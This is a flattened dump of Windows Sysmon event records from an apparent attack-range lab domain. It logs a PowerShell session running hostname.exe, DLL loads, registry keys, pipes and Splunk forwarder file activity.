12241200x800000000000000057346419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.471{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057346414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057346411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.456{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXEC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 12241200x800000000000000057346409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.456{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057346408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.456{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2593341(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2575350(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25751e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2565f01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2573443(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572fb5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64) 154100x800000000000000057346406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.422{8B6011A9-5B9A-618E-4DF3-04000000F101}9432C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 18141800x800000000000000057346405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:34.409{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x800000000000000057346404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:34.409{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000057346403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.187{8B6011A9-E4CD-6172-AAB2-01000000F101}9240ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\9240.xml~RFa3622142.TMPMD5=456D225B4D65C9CF435A86E0A35A2EE3,SHA256=98A44CE309D109FBE724C41274306C85F0B69B2A3FB9CA4D460D015BE0E930C7falsetrue 11241100x800000000000000057346402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.187{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\9240.xml~RFa3622142.TMP2021-11-12 12:18:34.187 254200x800000000000000057346401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.187{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\1kygeb2x.tmp2021-10-22 16:22:32.4192021-11-12 12:18:34.187 11241100x800000000000000057346400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.187{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\1kygeb2x.tmp2021-11-12 12:18:34.187 11241100x800000000000000057346399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.056{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.056{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=460AC18AB1DC0662AF65A3E08A526F88,SHA256=6FAEA235B896BD5FA57A975D0ABDFB10CF52A8821A8489086DDAD0D9AA6A4B8Dfalsetrue 23542300x800000000000000021219843Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:35.110{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0261BE20106FC46CBF7C9A608F842924,SHA256=A9C4FDFA7F0440FEEC661C351835895D83E58AD8C30D5AA719ECEA0553C8B9D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057346613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:35.955{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000590094\VirtualDesktopBinary Data 12241200x800000000000000057346612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:35.955{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000590094 354300x800000000000000057346611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:06.478{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54564-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057346610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.371{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.371{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6236918FC7D559EDD76104E059E2085C,SHA256=2681CDC9524395948C826A4A0158E6AA1711E57955D27B3BC38DE8366E7FDBF0falsetrue 11241100x800000000000000057346608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.324{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.324{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4D346866E246791959EB987338251EF8,SHA256=AA553B9E33B928D8F622BE4E8AA8DF45F6348216BAE26B96FB1617B5361BE9E7falsetrue 11241100x800000000000000057346606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C0EF555A8B52F5C86B2884739724F86,SHA256=F4E1055997CCE3D2399E217ADBE2B04E7B89743432AA5C1636C128267B0A0275falsetrue 11241100x800000000000000057346604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0B8BE509B6991363EF11C0102091CDB,SHA256=F6876D32AE20D17F301BE49111BE112705AC3CC4DF14C96B23E9238085E090EDfalsetrue 11241100x800000000000000057346602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E2EA7FB02FB344F80611DCD00BE06144,SHA256=5A8040F895B7745EE1AB20A5813EDB54DFCEBA22464B77D4036FB454FC2B21FFfalsetrue 11241100x800000000000000057346600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E4F5EF89255C6CF334EC42943DF50F,SHA256=0EB6A6226224DE4344BABDDCADF5398FDAAC4B2541488BFDB565A35E3A15FBD6falsetrue 11241100x800000000000000057346598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.109{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=93646E533AFA64650E383D0D92018961,SHA256=EA30E3AB8B9ACD5571A3F46D20739421A23F06309957B2ED29621EE776C44927falsetrue 11241100x800000000000000057346596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.056{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.056{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7DA091F392C205FC55F2C6C5CC937A89,SHA256=5193B3B1F762EA925FE642A69B51CDA0579AF1F67B9F728EBB3851DC1801A729falsetrue 11241100x800000000000000057346594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.008{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:35.007{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A951BEA0E057750FF3CF5358E443EBBA,SHA256=E3B50344999CE810E6A865EC683A9662C7AEB4DB9A5C3EBEA2B161F38133ADDFfalsetrue 23542300x800000000000000021219844Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:36.110{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C019A39EBA0DDC84A674ED0594FE63F,SHA256=91E05C684E2DBA167767D251995C7D5D9506FD055296A6CBC94A6DD2BDFBAE82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.723{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.723{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B88C0E045870D855498F17AC69F8B8A0,SHA256=1ABB4A7C555B79BB4BFE5E8EFDEC3DA156618A21523A9D76FCB262F3E7180D04falsetrue 11241100x800000000000000057346635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.623{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.623{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=75CA245302813247F20613541E0D33F1,SHA256=4461DFE55817323CA1C7EE42B19541AA31E9DEC782B75EEBF2FDF0D6E7A9BAE2falsetrue 11241100x800000000000000057346633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.523{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.523{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6867591E922C8BC5E45618B28B191BC,SHA256=29B571DF7923135F4693405DBF0938AE70FA780C72C49830F69D91430983EA9Afalsetrue 11241100x800000000000000057346631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.470{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.470{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0D39164C130DF007F7913F7EFA55FA23,SHA256=C16E5814385C5E93B491CD6B9567BE117C03EB5B1009825E8923637122F3E1FBfalsetrue 11241100x800000000000000057346629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:36.423{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-09-16 14:17:08.076 